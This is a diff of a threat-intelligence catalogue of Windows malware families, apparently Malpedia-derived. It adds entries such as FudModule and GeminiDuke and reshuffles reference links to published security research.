"https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
"https://sites.temple.edu/care/ci-rw-attacks/",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
- "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
- "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp"
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"
],
"synonyms": [
"BitPaymer",
@@ -23853,6 +25257,23 @@
"uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d",
"value": "FriedEx"
},
+ {
+ "description": "FudModule is a user-mode DLL that gets the ability to read and write arbitrary kernel memory via the BYOVD technique. Its main goal is to turn off Windows system monitoring features, which is done by modifying kernel variables and removing kernel callbacks. Its actions may very likely affect various types of security products, e.g. EDRs, firewalls, antimalware and even digital forensics tools.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule",
+ "https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf",
+ "https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/",
+ "https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "49b53f39-3e13-48e7-a2e3-5e173af343b3",
+ "value": "FudModule"
+ },
{
"description": "Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.",
"meta": {
@@ -23871,10 +25292,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
],
"synonyms": [
"RouterGod"
@@ -23889,11 +25311,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
"https://nao-sec.org/2021/01/royal-road-redive.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf"
+ "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -23914,6 +25336,19 @@
"uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
"value": "Furtim"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive",
+ "https://www.youtube.com/watch?v=_qdCGgQlHJE"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5de632a3-bf82-4cef-90fa-e7199fdb932c",
+ "value": "FusionDrive"
+ },
{
"description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.",
"meta": {
@@ -23985,21 +25420,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
+ "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.wired.com/?p=2171700",
"https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
"https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
"https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "https://www.wired.com/?p=2171700",
- "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
"https://www.lawfareblog.com/what-point-these-nation-state-indictments",
- "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
- "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf"
],
"synonyms": [
"GOZ",
@@ -24011,6 +25446,20 @@
"uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f",
"value": "Gameover P2P"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.game_player_framework",
+ "https://www.youtube.com/watch?v=yVqALLtvkN8&t=8117s",
+ "https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3efdc56a-793c-4fbb-99ea-a4d53899713a",
+ "value": "GamePlayerFramework"
+ },
{
"description": "",
"meta": {
@@ -24028,63 +25477,64 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
- "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html",
- "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html",
- "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/",
- "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/",
- "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
- "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
- "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
- "http://www.secureworks.com/research/threat-profiles/gold-garden",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
- "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/",
- "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom",
- "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
- "https://vimeo.com/449849549",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/",
"https://unit42.paloaltonetworks.com/revil-threat-actors/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
- "http://asec.ahnlab.com/1145",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
- "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
- "https://isc.sans.edu/diary/23417",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
"https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/",
"http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
- "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind",
+ "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
+ "https://vimeo.com/449849549",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/",
+ "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
+ "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
"https://www.secureworks.com/research/threat-profiles/gold-garden",
- "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html"
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/",
+ "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
+ "http://www.secureworks.com/research/threat-profiles/gold-garden",
+ "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
+ "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html",
+ "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/",
+ "http://asec.ahnlab.com/1145",
+ "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
+ "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
+ "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/",
+ "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://isc.sans.edu/diary/23417",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/"
],
"synonyms": [
"GrandCrab"
@@ -24139,12 +25589,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer",
- "https://github.com/eset/malware-ioc/tree/master/turla",
- "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html",
+ "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
"https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/turla",
"https://securelist.com/introducing-whitebear/81638/"
],
"synonyms": [
@@ -24161,6 +25614,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner",
"https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
"https://bazaar.abuse.ch/browse/signature/GCleaner/"
],
"synonyms": [],
@@ -24187,8 +25641,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gdrive",
- "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/",
- "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/"
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf",
+ "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
],
"synonyms": [
"DoomDrive",
@@ -24238,33 +25693,46 @@
"uuid": "e46ae329-a619-4cfc-8059-af326c11ee79",
"value": "GEMCUTTER"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke",
+ "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f3a4863f-1acd-4476-a8c7-1d4c162426e0",
+ "value": "GeminiDuke"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.get2",
- "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.goggleheadedhacker.com/blog/post/13",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
"https://github.com/Tera0017/TAFOF-Unpacker",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md"
+ "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/",
+ "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader"
],
"synonyms": [
"FRIENDSPEAK",
@@ -24285,15 +25753,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5abd7dee-cca1-4bee-9b82-da3f9be2970b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6f155c95-3090-4730-8d3b-0b246162a83a",
"value": "GetMail"
},
@@ -24303,11 +25762,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass",
"https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
- "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
- "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md"
+ "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md",
+ "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/"
],
"synonyms": [
"getmypos"
@@ -24331,11 +25790,12 @@
"value": "get_pwd"
},
{
- "description": "",
+ "description": "Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes",
- "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html"
+ "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
